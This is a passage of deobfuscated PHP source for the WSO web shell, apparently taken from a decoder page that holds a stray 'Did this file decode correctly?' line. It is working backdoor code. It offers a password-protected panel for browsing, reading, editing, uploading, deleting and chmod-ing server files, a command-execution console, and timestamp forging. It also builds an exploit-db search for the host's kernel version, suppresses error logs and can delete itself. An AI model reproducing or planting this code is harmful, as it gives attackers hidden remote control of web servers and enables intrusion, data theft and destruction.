: htmlspecialchars($_POST["p1"], ENT_QUOTES)) .
"';
var p2_ = '" .
(strpos(@$_POST["p2"], "
") !== false
? ""
: htmlspecialchars($_POST["p2"], ENT_QUOTES)) .
"';\xd\xa var p3_ = '" .
(strpos(@$_POST["p3"], "\xa") !== false
? ""
: htmlspecialchars($_POST["p3"], ENT_QUOTES)) .
"';
var d = document;\xd\xa\x9function set(a,c,p1,p2,p3,charset) {
\xa \x9if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\xd\xa if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
\xa \x9if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\xd
\x9if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
\xa\x9\x9if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\xd
}\xd\xa\x9function g(a,c,p1,p2,p3,charset) {
\x9 set(a,c,p1,p2,p3,charset);\xd\xa\x9 d.mf.submit();\xd
\x9}\xd
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);\xd\xa \x9var params = 'ajax=true';\xd\xa\x9\x9for(i=0;i<d.mf.elements.length;i++)
\xa\x9 \x9params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\xd
\x9\x9sr('" .
addslashes($_SERVER["REQUEST_URI"]) .
"', params);
\xa\x9}\xd
\x9function sr(url, params) {\xd
\x9if (window.XMLHttpRequest)
\xa \x9 req = new XMLHttpRequest();\xd
\x9\x9else if (window.ActiveXObject)\xd\xa\x9\x9 req = new ActiveXObject('Microsoft.XMLHTTP');\xd
if (req) {\xd
req.onreadystatechange = processReqChange;\xd\xa req.open('POST', url, true);
\xa req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\xd\xa req.send(params);\xd
}
\xa }
\xa\x9function processReqChange() {
if( (req.readyState == 4) )
\xa \x9\x9if(req.status == 200) {\xd
\x9\x9var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');\xd
var arr=reg.exec(req.responseText);\xd
\x9 eval(arr[2].substr(0, arr[1]));\xd\xa\x9\x9\x9} else alert('Request error!');
\xa\x9}
</script>
\xa<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>\xd
<input type=hidden name=a>\xd
<input type=hidden name=c>\xd
<input type=hidden name=p1>
\xa<input type=hidden name=p2>\xd
<input type=hidden name=p3>
\xa<input type=hidden name=charset>\xd
</form>";
goto yrJci;
HJ09z:
$totalSpace = @disk_total_space($GLOBALS["cwd"]);
goto XR0lk;
mxXoN:
$explink =
"http://exploit-db.com/search/?action=search&filter_description=";
goto CGFSE;
jqLRT:
$menu = "";
goto pyClH;
znu8e:
$kernel = @php_uname("s");
goto mxXoN;
IUSK1:
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .=
"<a href='#' onclick='g("FilesMan","";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . "/";
}
$cwd_links .= "")'>" . $path[$i] . "/</a>";
}
goto yWMQp;
QAzn_:
$opt_charsets = "";
goto wJ6Eu;
hedz2:
$m["Self remove"] =
"SelfRemove";
goto jqLRT;
MFEdT:
$n = count($path);
goto IUSK1;
PbU2y:
$path = explode("/", $GLOBALS["cwd"]);
goto MFEdT;
CGFSE:
if (strpos("Linux", $kernel) !== false) {
$explink .= urlencode(
"Linux Kernel " .
substr($release, 0, 6)
);
} else {
$explink .= urlencode($kernel . " " . substr($release, 0, 3));
}
goto oXY47;
yrJci:
$freeSpace = @diskfreespace($GLOBALS["cwd"]);
goto HJ09z;
pyClH:
foreach ($m as $k => $v) {
$menu .=
"<th width="" .
(int) (100 / count($m)) .
"%">[ <a href="#" onclick="g('" .
$v .
"',null,'','','')">" .
$k .
"</a> ]</th>";
}
goto QoI2U;
wJ6Eu:
foreach ($charsets as $item) {
$opt_charsets .=
"<option value="" .
$item .
"" " .
($_POST["charset"] == $item
? "selected"
: "") .
">" .
$item .
"</option>";
}
goto M4wyI;
dJUUJ:
if ($GLOBALS["os"] == "win") {
foreach (range("c", "z") as $drive) {
if (is_dir($drive . ":\")) {
$drives .=
"<a href="#" onclick="g('FilesMan','" .
$drive .
":/')">[ " .
$drive .
" ]</a> ";
}
}
}
goto FKql5;
wwJNm:
global $color;
goto nmRB7;
gDdS4:
$release = @php_uname("r");
goto znu8e;
oXY47:
if (
!function_exists("posix_getegid")
) {
goto VMtJd;
VMtJd:
$user = @get_current_user();
goto RNehq;
RNehq:
$uid = @getmyuid();
goto kWs3Y;
n3X6Y:
$group = "?";
goto dyMHz;
kWs3Y:
$gid = @getmygid();
goto n3X6Y;
dyMHz:
} else {
goto ec83q;
yJq0B:
$uid = $uid["uid"];
goto nZ1Iw;
nZ1Iw:
$group = $gid["name"];
goto LgEQ1;
LgEQ1:
$gid = $gid["gid"];
goto XEe3x;
q9aTZ:
$user = $uid["name"];
goto yJq0B;
ERGtZ:
$gid = @posix_getgrgid(posix_getegid());
goto q9aTZ;
ec83q:
$uid = @posix_getpwuid(posix_geteuid());
goto ERGtZ;
XEe3x:
}
goto HU3s7;
HU3s7:
$cwd_links = "";
goto PbU2y;
RzURU:
}
goto pXSrD;
lUvYe:
if (
!function_exists(
"posix_getgrgid"
) &&
strpos(
$GLOBALS[
"disable_functions"
],
"posix_getgrgid"
) === false
) {
function posix_getgrgid($p)
{
return false;
}
}
goto d62j5;
V8rDW:
@set_time_limit(0);
goto hd5Oa;
KCE0z:
function wsoWhich($p)
{
goto qE7x8;
bvBsL:
if (!empty($path)) {
return $path;
}
goto A0ITv;
qE7x8:
$path = wsoEx("which " . $p);
goto bvBsL;
A0ITv:
return false;
goto xhdvj;
xhdvj:
}
goto HhMRL;
guAyk:
function wsoScandir($dir)
{
if (function_exists("scandir")) {
return scandir($dir);
} else {
goto AwLVq;
hfmSV:
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
goto Rc9At;
Rc9At:
return $files;
goto dO6EV;
AwLVq:
$dh = opendir($dir);
goto hfmSV;
dO6EV:
}
}
goto KCE0z;
pXSrD:
function wsoFooter()
{
$is_writable = is_writable($GLOBALS["cwd"])
? " <font color='green'>(Writeable)</font>"
: " <font color=red>(Not writable)</font>";
echo "\xd\xa</div>\xd
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\xd\xa\x9<tr>
\x9\x9<td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" .
htmlspecialchars($GLOBALS["cwd"]) .
"'><input type=submit value='>>'></form></td>
\xa \x9<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\xd
</tr><tr>
\xa\x9 <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
\xa\x9</tr><tr>\xd\xa <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
\xa <td><form method='post' ENCTYPE='multipart/form-data'>
\xa\x9\x9<input type=hidden name=a value='FilesMAn'>
\x9 <input type=hidden name=c value='" .
$GLOBALS["cwd"] .
"'>\xd
\x9 <input type=hidden name=p1 value='uploadFile'>\xd
\x9\x9<input type=hidden name=charset value='" .
(isset($_POST["charset"])
? $_POST["charset"]
: "") .
"'>
\x9\x9<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
\x9</tr></table></div></body></html>";
}
goto XeOpc;
Qn_9k:
function wsoLogin()
{
die(
"<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"
);
}
goto e2q7d;
i6mTz:
function actionSelfRemove()
{
goto KQZY3;
trHKc:
if ($_POST["p1"] != "yes") {
wsoHeader();
}
goto X7soZ;
X7soZ:
echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>";
goto tsvXj;
KQZY3:
if ($_POST["p1"] == "yes") {
if (
@unlink(
preg_replace(
"!\(\d+\)\s.*!",
"",
__FILE__
)
)
) {
die(
"Shell has been removed"
);
} else {
echo "unlink error!";
}
}
goto trHKc;
tsvXj:
wsoFooter();
goto n3JxC;
n3JxC:
}
goto DbGtY;
TQr3j:
if (!empty($auth_pass)) {
if (
isset($_POST["pass"]) &&
md5($_POST["pass"]) == $auth_pass
) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]),
$auth_pass
);
}
if (
!isset(
$_COOKIE[md5($_SERVER["HTTP_HOST"])]
) ||
$_COOKIE[md5($_SERVER["HTTP_HOST"])] !=
$auth_pass
) {
wsoLogin();
}
}
goto tZUOM;
e2q7d:
function WSOsetcookie($k, $v)
{
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
goto TQr3j;
yXkOt:
function wsoViewSize($s)
{
if ($s >= 1073741824) {
return sprintf("%1.2f", $s / 1073741824) . " GB";
} elseif ($s >= 1048576) {
return sprintf("%1.2f", $s / 1048576) . " MB";
} elseif ($s >= 1024) {
return sprintf("%1.2f", $s / 1024) . " KB";
} else {
return $s . " B";
}
}
goto etiAC;
Zxful:
exit(); ?>
Did this file decode correctly?
Original Code
<?php
goto Cjo7J;
LqaMO:
$safe_mode = @ini_get("safe_mode");
goto zGahs;
zGahs:
if (!$safe_mode) {
error_reporting(0);
}
goto Gop14;
j2Rfu:
if (
!empty($_POST["a"]) &&
function_exists("action" . $_POST["a"])
) {
call_user_func("action" . $_POST["a"]);
}
goto Zxful;
GFRHq:
@ini_set("error_log", null);
goto g7ZCc;
N84uU:
function actionFilesMan()
{
goto J7jRR;
la8rp:
if (class_exists("ZipArchive")) {
echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
}
goto GTtN3;
uO4Od:
if (!empty($_POST["p1"])) {
switch ($_POST["p1"]) {
case "uploadFile":
if (
!@move_uploaded_file(
$_FILES["f"]["tmp_name"],
$_FILES["f"]["name"]
)
) {
echo "Can't upload file!";
}
break;
case "mkdir":
if (!@mkdir($_POST["p2"])) {
echo "Can't create new dir";
}
break;
case "delete":
goto zgV_d;
mm32x:
break;
goto hEfbk;
zgV_d:
function deleteDir($path)
{
goto RrCM3;
zxeby:
$dh = opendir($path);
goto TCJ3G;
TCJ3G:
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if (
basename($item) == ".." ||
basename($item) == "."
) {
continue;
}
$type = filetype($item);
if ($type == "dir") {
deleteDir($item);
} else {
@unlink($item);
}
}
goto qhDI4;
SLRoZ:
@rmdir($path);
goto ld2N6;
RrCM3:
$path = substr($path, -1) == "/" ? $path : $path . "/";
goto zxeby;
qhDI4:
closedir($dh);
goto SLRoZ;
ld2N6:
}
goto Jstso;
Jstso:
if (is_array(@$_POST["f"])) {
foreach ($_POST["f"] as $f) {
goto Fce39;
jTf8C:
if (is_dir($f)) {
deleteDir($f);
} else {
@unlink($f);
}
goto sVDIO;
Fce39:
if ($f == "..") {
continue;
}
goto NavX2;
NavX2:
$f = urldecode($f);
goto jTf8C;
sVDIO:
}
}
goto mm32x;
hEfbk:
case "paste":
goto aIzMf;
aIzMf:
if ($_COOKIE["act"] == "copy") {
function copy_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
goto DXZu5;
OpM7_:
$h = @opendir($c . $s);
goto XF_lF;
XF_lF:
while (($f = @readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste(
$c . $s . "/",
$f,
$d . $s . "/"
);
}
}
goto v_Vn9;
DXZu5:
mkdir($d . $s);
goto OpM7_;
v_Vn9:
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE["f"] as $f) {
copy_paste(
$_COOKIE["c"],
$f,
$GLOBALS["cwd"]
);
}
} elseif ($_COOKIE["act"] == "move") {
function move_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
goto qKJrU;
TXDEI:
while (($f = @readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste(
$c . $s . "/",
$f,
$d . $s . "/"
);
}
}
goto xPGvS;
AwOVO:
$h = @opendir($c . $s);
goto TXDEI;
qKJrU:
mkdir($d . $s);
goto AwOVO;
xPGvS:
} elseif (@is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE["f"] as $f) {
@rename(
$_COOKIE["c"] . $f,
$GLOBALS["cwd"] . $f
);
}
} elseif ($_COOKIE["act"] == "zip") {
if (
class_exists("ZipArchive")
) {
$zip = new ZipArchive();
if ($zip->open($_POST["p2"], 1)) {
goto Jun5P;
Jun5P:
chdir($_COOKIE["c"]);
goto T_RpN;
MVV2r:
$zip->close();
goto CqwAG;
T_RpN:
foreach ($_COOKIE["f"] as $f) {
if ($f == "..") {
continue;
}
if (@is_file($_COOKIE["c"] . $f)) {
$zip->addFile($_COOKIE["c"] . $f, $f);
} elseif (@is_dir($_COOKIE["c"] . $f)) {
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator(
$f . "/"
)
);
foreach ($iterator as $key => $value) {
$zip->addFile(realpath($key), $key);
}
}
}
goto JhWjt;
JhWjt:
chdir($GLOBALS["cwd"]);
goto MVV2r;
CqwAG:
}
}
} elseif ($_COOKIE["act"] == "unzip") {
if (
class_exists("ZipArchive")
) {
$zip = new ZipArchive();
foreach ($_COOKIE["f"] as $f) {
if ($zip->open($_COOKIE["c"] . $f)) {
$zip->extractTo($GLOBALS["cwd"]);
$zip->close();
}
}
}
} elseif ($_COOKIE["act"] == "tar") {
goto nrwbR;
QmWa1:
chdir($GLOBALS["cwd"]);
goto bK26y;
zHKjB:
wsoEx(
"tar cfzv " .
escapeshellarg($_POST["p2"]) .
" " .
implode(" ", $_COOKIE["f"])
);
goto QmWa1;
BU3zr:
$_COOKIE["f"] = array_map(
"escapeshellarg",
$_COOKIE["f"]
);
goto zHKjB;
nrwbR:
chdir($_COOKIE["c"]);
goto BU3zr;
bK26y:
}
goto tJ8ED;
HwZnR:
setcookie("f", "", time() - 3600);
goto TZk2t;
TZk2t:
break;
goto yoTwQ;
tJ8ED:
unset($_COOKIE["f"]);
goto HwZnR;
yoTwQ:
default:
if (!empty($_POST["p1"])) {
goto TYMaj;
XHEG8:
WSOsetcookie("c", @$_POST["c"]);
goto Unr9o;
TYMaj:
WSOsetcookie("act", $_POST["p1"]);
goto XUMLY;
XUMLY:
WSOsetcookie("f", serialize(@$_POST["f"]));
goto XHEG8;
Unr9o:
}
break;
}
}
goto bpziK;
JbUVa:
usort($files, "wsoCmp");
goto pBUl1;
RjKbq:
function wsoCmp($a, $b)
{
if ($GLOBALS["sort"][0] != "size") {
return strcmp(
strtolower($a[$GLOBALS["sort"][0]]),
strtolower($b[$GLOBALS["sort"][0]])
) * ($GLOBALS["sort"][1] ? 1 : -1);
} else {
return ($a["size"] < $b["size"] ? -1 : 1) *
($GLOBALS["sort"][1] ? 1 : -1);
}
}
goto JbUVa;
flVXx:
$GLOBALS["sort"] = $sort;
goto RjKbq;
b42P7:
echo "</select> ";
goto zga6H;
QsnjB:
$dirContent = wsoScandir(
isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]
);
goto DufhY;
EoM5y:
if (!empty($_POST["p1"])) {
if (
preg_match(
"!s_([A-z]+)_(\d{1})!",
$_POST["p1"],
$match
)
) {
$sort = [$match[1], (int) $match[2]];
}
}
goto uaEIV;
ecDrl:
echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>";
goto QsnjB;
J7jRR:
if (!empty($_COOKIE["f"])) {
$_COOKIE["f"] = @unserialize($_COOKIE["f"]);
}
goto uO4Od;
zqQv8:
foreach ($files as $f) {
echo "<tr" .
($l ? " class=l1" : "") .
"><td><input type=checkbox name="f[]" value="" .
urlencode($f["name"]) .
"" class=chkbx></td><td><a href=# onclick="" .
($f["type"] == "file"
? "g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'view')">" .
htmlspecialchars($f["name"])
: "g('FilesMan','" .
$f["path"] .
"');" " .
(empty($f["link"])
? ""
: "title='{$f["link"]}'") .
"><b>[ " .
htmlspecialchars($f["name"]) .
" ]</b>") .
"</a></td><td>" .
($f["type"] == "file"
? wsoViewSize($f["size"])
: $f["type"]) .
"</td><td>" .
$f["modify"] .
"</td><td>" .
$f["owner"] .
"/" .
$f["group"] .
"</td><td><a href=# onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"','chmod')">" .
$f["perms"] .
"</td><td><a href="#" onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'touch')">T</a>" .
($f["type"] == "file"
? " <a href="#" onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'download')">D</a>"
: "") .
"</td></tr>";
$l = $l ? 0 : 1;
}
goto b9q_L;
ICFmG:
$l = 0;
goto zqQv8;
TSLht:
$n = count($dirContent);
goto p625P;
lC5LC:
$dirs = $files = [];
goto TSLht;
uaEIV:
echo "<script>\xd
function sa() {
for(i=0;i<d.files.elements.length;i++)
\x9 if(d.files.elements[i].type == 'checkbox')\xd\xa \x9 d.files.elements[i].checked = d.files.elements[0].checked;\xd\xa }\xd\xa</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xd
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" .
($sort[1] ? 0 : 1) .
"")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" .
($sort[1] ? 0 : 1) .
"")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" .
($sort[1] ? 0 : 1) .
"")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" .
($sort[1] ? 0 : 1) .
"")'>Permissions</a></th><th>Actions</th></tr>";
goto lC5LC;
b9q_L:
echo "<tr><td colspan=7>\xd\xa <input type=hidden name=a value='FilesMan'>\xd\xa\x9<input type=hidden name=c value='" .
htmlspecialchars($GLOBALS["cwd"]) .
"'>
\xa <input type=hidden name=charset value='" .
(isset($_POST["charset"])
? $_POST["charset"]
: "") .
"'>\xd\xa <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
goto la8rp;
MMpaa:
$sort = ["name", 1];
goto EoM5y;
bpziK:
wsoHeader();
goto ecDrl;
GTtN3:
echo "<option value='tar'>Compress (tar.gz)</option>";
goto qCBL1;
zga6H:
if (
!empty($_COOKIE["act"]) &&
@count($_COOKIE["f"]) &&
($_COOKIE["act"] == "zip" ||
$_COOKIE["act"] == "tar")
) {
echo "file name: <input type=text name=p2 value='wso_" .
date("Ymd_His") .
"." .
($_COOKIE["act"] == "zip"
? "zip"
: "tar.gz") .
"'> ";
}
goto T3WX2;
DufhY:
if ($dirContent === false) {
goto KJVLY;
PFKsl:
wsoFooter();
goto ZsRi7;
KJVLY:
echo "Can't open this folder!";
goto PFKsl;
ZsRi7:
return;
goto Uwcm2;
Uwcm2:
}
goto S7vm3;
T3WX2:
echo "<input type='submit' value='>>'></td></tr></form></table></div>";
goto LlrBb;
LlrBb:
wsoFooter();
goto JxN5l;
S7vm3:
global $sort;
goto MMpaa;
pBUl1:
usort($dirs, "wsoCmp");
goto zukJ7;
p625P:
for ($i = 0; $i < $n; $i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = [
"name" => $dirContent[$i],
"path" => $GLOBALS["cwd"] . $dirContent[$i],
"modify" => date(
"Y-m-d H:i:s",
@filemtime($GLOBALS["cwd"] . $dirContent[$i])
),
"perms" => wsoPermsColor(
$GLOBALS["cwd"] . $dirContent[$i]
),
"size" => @filesize(
$GLOBALS["cwd"] . $dirContent[$i]
),
"owner" => $ow["name"]
? $ow["name"]
: @fileowner($dirContent[$i]),
"group" => $gr["name"]
? $gr["name"]
: @filegroup($dirContent[$i]),
];
if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) {
$files[] = array_merge($tmp, [
"type" => "file",
]);
} elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) {
$dirs[] = array_merge($tmp, [
"type" => "link",
"link" => readlink($tmp["path"]),
]);
} elseif (
@is_dir($GLOBALS["cwd"] . $dirContent[$i]) &&
$dirContent[$i] != "."
) {
$dirs[] = array_merge($tmp, ["type" => "dir"]);
}
}
goto flVXx;
qCBL1:
if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) {
echo "<option value='paste'>Paste / Compress</option>";
}
goto b42P7;
zukJ7:
$files = array_merge($dirs, $files);
goto ICFmG;
JxN5l:
}
goto KC9ar;
xB4MH:
function actionFilesTools()
{
goto BkWtk;
URhzm:
if (is_file($_POST["p1"])) {
$m = [
"View",
"Highlight",
"Download",
"Hexdump",
"Edit",
"Chmod",
"Rename",
"Touch",
];
} else {
$m = [
"Chmod",
"Rename",
"Touch",
];
}
goto ehyTX;
gIv2Z:
echo "</div>";
goto q1Rl0;
ehyTX:
foreach ($m as $v) {
echo "<a href=# onclick="g(null,null,'" .
urlencode($_POST["p1"]) .
"','" .
strtolower($v) .
"')">" .
(strtolower($v) == @$_POST["p2"]
? "<b>[ " . $v . " ]</b>"
: $v) .
"</a> ";
}
goto OeBNf;
FcH_v:
if (!$uid) {
$uid["name"] = @fileowner($_POST["p1"]);
$gid["name"] = @filegroup($_POST["p1"]);
} else {
$gid = @posix_getgrgid(@filegroup($_POST["p1"]));
}
goto XQqyZ;
tJhrh:
if (@$_POST["p2"] == "mkfile") {
if (!file_exists($_POST["p1"])) {
$fp = @fopen($_POST["p1"], "w");
if ($fp) {
$_POST["p2"] = "edit";
fclose($fp);
}
}
}
goto UpcWr;
hJxBN:
echo "<h1>File tools</h1><div class=content>";
goto LggyK;
jReNS:
if (empty($_POST["p2"])) {
$_POST["p2"] = "view";
}
goto URhzm;
OeBNf:
echo "<br><br>";
goto kfx86;
vLiGd:
echo "<span>Create time:</span> " .
date(
"Y-m-d H:i:s",
filectime($_POST["p1"])
) .
" <span>Access time:</span> " .
date(
"Y-m-d H:i:s",
fileatime($_POST["p1"])
) .
" <span>Modify time:</span> " .
date(
"Y-m-d H:i:s",
filemtime($_POST["p1"])
) .
"<br><br>";
goto jReNS;
LggyK:
if (!file_exists(@$_POST["p1"])) {
goto uyJNU;
C_fb1:
return;
goto fRIHs;
uyJNU:
echo "File not exists";
goto aEu8k;
aEu8k:
wsoFooter();
goto C_fb1;
fRIHs:
}
goto RVSqZ;
BkWtk:
if (isset($_POST["p1"])) {
$_POST["p1"] = urldecode($_POST["p1"]);
}
goto nB0r7;
UpcWr:
wsoHeader();
goto hJxBN;
q1Rl0:
wsoFooter();
goto lZIie;
RVSqZ:
$uid = @posix_getpwuid(@fileowner($_POST["p1"]));
goto FcH_v;
kfx86:
switch ($_POST["p2"]) {
case "view":
goto QAifq;
bn9Hw:
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
goto bbBoN;
bbBoN:
echo "</pre>";
goto K9Wsy;
GqRN7:
$fp = @fopen($_POST["p1"], "r");
goto bn9Hw;
K9Wsy:
break;
goto xBp1j;
QAifq:
echo "<pre class=ml1>";
goto GqRN7;
xBp1j:
case "highlight":
if (@is_readable($_POST["p1"])) {
goto QC8Iq;
XU2TQ:
$code = @highlight_file($_POST["p1"], true);
goto MtAXT;
QC8Iq:
echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">";
goto XU2TQ;
MtAXT:
echo str_replace(
["<span ", "</span>"],
[
"<font ",
"</font>",
],
$code
) . "</div>";
goto nntLP;
nntLP:
}
break;
case "chmod":
goto P8hG1;
LoNwV:
break;
goto AyuC5;
lmil1:
echo "<script>p3_="";</script><form onsubmit="g(null,null,'" .
urlencode($_POST["p1"]) .
"',null,this.chmod.value);return false;"><input type=text name=chmod value="" .
substr(sprintf("%o", fileperms($_POST["p1"])), -4) .
""><input type=submit value=">>"></form>";
goto LoNwV;
AAUh2:
clearstatcache();
goto lmil1;
P8hG1:
if (!empty($_POST["p3"])) {
goto dVl9Y;
brcvZ:
for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) {
$perms +=
(int) $_POST["p3"][$i] *
pow(8, strlen($_POST["p3"]) - $i - 1);
}
goto NKCFJ;
NKCFJ:
if (!@chmod($_POST["p1"], $perms)) {
echo "Can't set permissions!<br><script>document.mf.p3.value="";</script>";
}
goto PY3E2;
dVl9Y:
$perms = 0;
goto brcvZ;
PY3E2:
}
goto AAUh2;
AyuC5:
case "edit":
goto H2fMN;
jCDwf:
echo "</textarea><input type=submit value=">>"></form>";
goto Pjp_6;
l2f3k:
echo "<form onsubmit="g(null,null,'" .
urlencode($_POST["p1"]) .
"',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>";
goto B2Klk;
YessQ:
if (!empty($_POST["p3"])) {
goto rcwpk;
JCP0G:
$fp = @fopen($_POST["p1"], "w");
goto UIGX9;
UIGX9:
if ($fp) {
goto AyUGu;
ZpECv:
echo "Saved!<br><script>p3_="";</script>";
goto ukKwu;
zJt34:
@fclose($fp);
goto ZpECv;
AyUGu:
@fwrite($fp, $_POST["p3"]);
goto zJt34;
ukKwu:
@touch($_POST["p1"], $time, $time);
goto w_o1Q;
w_o1Q:
}
goto ccEmf;
yLb3a:
$_POST["p3"] = substr($_POST["p3"], 1);
goto JCP0G;
rcwpk:
$time = @filemtime($_POST["p1"]);
goto yLb3a;
ccEmf:
}
goto l2f3k;
H2fMN:
if (!is_writable($_POST["p1"])) {
echo "File isn't writeable";
break;
}
goto YessQ;
B2Klk:
$fp = @fopen($_POST["p1"], "r");
goto of9BR;
of9BR:
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
goto jCDwf;
Pjp_6:
break;
goto Gznea;
Gznea:
case "hexdump":
goto m3kPv;
AuUGX:
$h = ["00000000<br>", "", ""];
goto GyLAr;
qeOJi:
$n = 0;
goto AuUGX;
jL3k2:
echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>" .
$h[0] .
"</pre></span></td><td bgcolor=#282828><pre>" .
$h[1] .
"</pre></td><td bgcolor=#333333><pre>" .
htmlspecialchars($h[2]) .
"</pre></td></tr></table>";
goto Ufiap;
m3kPv:
$c = @file_get_contents($_POST["p1"]);
goto qeOJi;
Lem2Z:
for ($i = 0; $i < $len; ++$i) {
$h[1] .= sprintf("%02X", ord($c[$i])) . " ";
switch (ord($c[$i])) {
case 0:
$h[2] .= " ";
break;
case 9:
$h[2] .= " ";
break;
case 10:
$h[2] .= " ";
break;
case 13:
$h[2] .= " ";
break;
default:
$h[2] .= $c[$i];
break;
}
$n++;
if ($n == 32) {
goto NPU7A;
NPU7A:
$n = 0;
goto LQkUO;
fObRZ:
$h[1] .= "<br>";
goto fMXko;
LQkUO:
if ($i + 1 < $len) {
$h[0] .=
sprintf("%08X", $i + 1) .
"<br>";
}
goto fObRZ;
fMXko:
$h[2] .= "
";
goto BJu_G;
BJu_G:
}
}
goto jL3k2;
GyLAr:
$len = strlen($c);
goto Lem2Z;
Ufiap:
break;
goto owLSP;
owLSP:
case "rename":
goto DPp_y;
zaQju:
break;
goto Mf7Ir;
DPp_y:
if (!empty($_POST["p3"])) {
if (!@rename($_POST["p1"], $_POST["p3"])) {
echo "Can't rename!<br>";
} else {
die(
"<script>g(null,null,"" .
urlencode($_POST["p3"]) .
"",null,"")</script>"
);
}
}
goto S0xqX;
S0xqX:
echo "<form onsubmit="g(null,null,'" .
urlencode($_POST["p1"]) .
"',null,this.name.value);return false;"><input type=text name=name value="" .
htmlspecialchars($_POST["p1"]) .
""><input type=submit value=">>"></form>";
goto zaQju;
Mf7Ir:
case "touch":
goto MdNj9;
fcpc8:
echo "<script>p3_="";</script><form onsubmit="g(null,null,'" .
urlencode($_POST["p1"]) .
"',null,this.touch.value);return false;"><input type=text name=touch value="" .
date(
"Y-m-d H:i:s",
@filemtime($_POST["p1"])
) .
""><input type=submit value=">>"></form>";
goto vSHOq;
vSHOq:
break;
goto RapuR;
GWQpw:
clearstatcache();
goto fcpc8;
MdNj9:
if (!empty($_POST["p3"])) {
$time = strtotime($_POST["p3"]);
if ($time) {
if (!touch($_POST["p1"], $time, $time)) {
echo "Fail!";
} else {
echo "Touched!";
}
} else {
echo "Bad time format!";
}
}
goto GWQpw;
RapuR:
}
goto gIv2Z;
nB0r7:
if (@$_POST["p2"] == "download") {
if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) {
goto kEAXk;
LrqUY:
$fp = @fopen($_POST["p1"], "r");
goto oCCHm;
rpfQA:
if (
function_exists(
"mime_content_type"
)
) {
$type = @mime_content_type($_POST["p1"]);
header(
"Content-Type: " .
$type
);
} else {
header(
"Content-Type: application/octet-stream"
);
}
goto LrqUY;
oCCHm:
if ($fp) {
while (!@feof($fp)) {
echo @fread($fp, 1024);
}
fclose($fp);
}
